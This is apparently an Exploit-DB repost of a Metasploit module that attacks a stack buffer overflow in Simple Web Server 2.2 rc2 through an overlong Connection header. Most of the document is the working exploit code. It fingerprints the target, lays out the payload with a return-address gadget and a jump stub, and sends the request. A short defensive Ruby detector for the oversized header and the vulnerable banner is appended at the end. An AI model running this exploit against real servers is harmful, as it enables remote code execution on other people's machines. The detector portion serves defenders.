Wubi

Simple Web Server Connection Header Buffer Overflow


[table=width: 500, class: grid]
[tr][td]EDB-ID: 20028[/td][td]CVE: N/A[/td][td]OSVDB-ID: N/A[/td][/tr]
[tr][td]Author: metasploit[/td][td]Published: 2012-07-23[/td][td]Verified: yes[/td][/tr]
[tr][td]Exploit Code: see below[/td][td]Vulnerable App: N/A[/td][td][/td][/tr]
[/table]

[code]
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  # Only run against servers whose banner identifies the vulnerable product.
  HttpFingerprint = { :pattern => [ /PMSoftware-SWS/ ] }

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Simple Web Server Connection Header Buffer Overflow",
      'Description'    => %q{
        This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user
        can send a long string in the Connection header to cause an overflow on the
        stack when vsprintf() is used, and gain arbitrary code execution. The
        module has been tested successfully on Windows 7 SP1 and Windows XP SP3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'mr.pr0n', # Vulnerability Discovery and PoC
          'juan'     # Metasploit module
        ],
      'References'     =>
        [
          ['EDB', '19937'],
          ['URL', 'http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/']
        ],
      'Payload'        =>
        {
          'BadChars'       => "\x00\x0a\x0d",
          'Space'          => 2048,
          'DisableNops'    => true,
          'PrependEncoder' => "\x81\xC4\x60\xF0\xFF\xFF", # add esp, -4000
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => "process",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret'       => 0x6fcbc64b, # call edi from libstdc++-6.dll
              'Offset'    => 2048,
              'OffsetEDI' => 84
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jul 20 2012",
      'DefaultTarget'  => 0))
  end

  def check
    res = send_request_raw({'uri' => '/'})
    if res and res.headers['Server'] =~ /PMSoftware\-SWS\/2\.[0-2]/
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    # Buffer layout: payload, padding up to the saved return address at
    # 'Offset', the 'call edi' gadget, 'OffsetEDI' bytes of filler, and a
    # short backwards jump that lands at the start of the payload.
    sploit = payload.encoded
    sploit << rand_text(target['Offset'] - sploit.length)
    sploit << [target.ret].pack("V") # eip
    sploit << rand_text(target['OffsetEDI'])
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{sploit.length}").encode_string

    print_status("Trying target #{target.name}...")

    connect

    # The whole buffer travels as the value of the Connection request header.
    send_request_cgi({
      'uri'        => '/',
      'version'    => '1.1',
      'method'     => 'GET',
      'connection' => sploit
    })

    disconnect

  end
end
[/code]
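As an added example that is not part of the Metasploit module or the original post, a small Ruby check that applies the same two signals from the defender's side: the oversized Connection header value the module sends, and the Server banner its check() method matches. The 256-byte threshold and all sample traffic below are constructed assumptions for the example.

```ruby
# Added example (not part of the module above): inspect raw HTTP traffic for
# the two observable signals of this attack: a Connection header far larger
# than any legitimate value, and the vulnerable PMSoftware-SWS 2.x banner.

# Assumed threshold: real Connection values are a few tokens ("keep-alive",
# "close"); the module's buffer is 2048 bytes of payload plus a return
# address, filler and a jump stub, so a few hundred bytes is already noise.
MAX_CONNECTION_LEN = 256

# Parse "Name: value" header lines from a raw HTTP request or response.
# Works on the raw bytes so non-UTF-8 payload bytes do not break matching.
# Returns [start_line, { lowercase_name => value }].
def parse_headers(raw)
  lines = raw.b.split(/\r?\n/)
  start_line = lines.shift
  headers = {}
  lines.each do |line|
    break if line.empty?                 # end of the header block
    name, value = line.split(':', 2)
    next if value.nil?                   # skip malformed lines
    headers[name.strip.downcase] = value.strip
  end
  [start_line, headers]
end

# Returns an array of finding strings for one raw request (empty if clean).
def inspect_request(raw)
  _, headers = parse_headers(raw)
  findings = []
  conn = headers['connection']
  return findings if conn.nil?
  if conn.length > MAX_CONNECTION_LEN
    findings << "oversized Connection header (#{conn.length} bytes)"
  end
  # Encoded payload bytes are a second, independent signal.
  if conn =~ /[^[:print:]]/
    findings << "non-printable bytes in Connection header"
  end
  findings
end

# Same banner test as the module's check(): SWS 2.0 through 2.2 is affected.
def vulnerable_banner?(raw_response)
  _, headers = parse_headers(raw_response)
  !!(headers['server'] =~ /PMSoftware-SWS\/2\.[0-2]/)
end

# Constructed sample request mimicking the module's shape (printable filler
# stands in for the encoded payload).
SAMPLE_REQUEST = "GET / HTTP/1.1\r\nHost: example.test\r\nConnection: " +
                 ("A" * 2048) + "\x90\xE9" + "\r\n\r\n"

puts inspect_request(SAMPLE_REQUEST) if __FILE__ == $0
```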
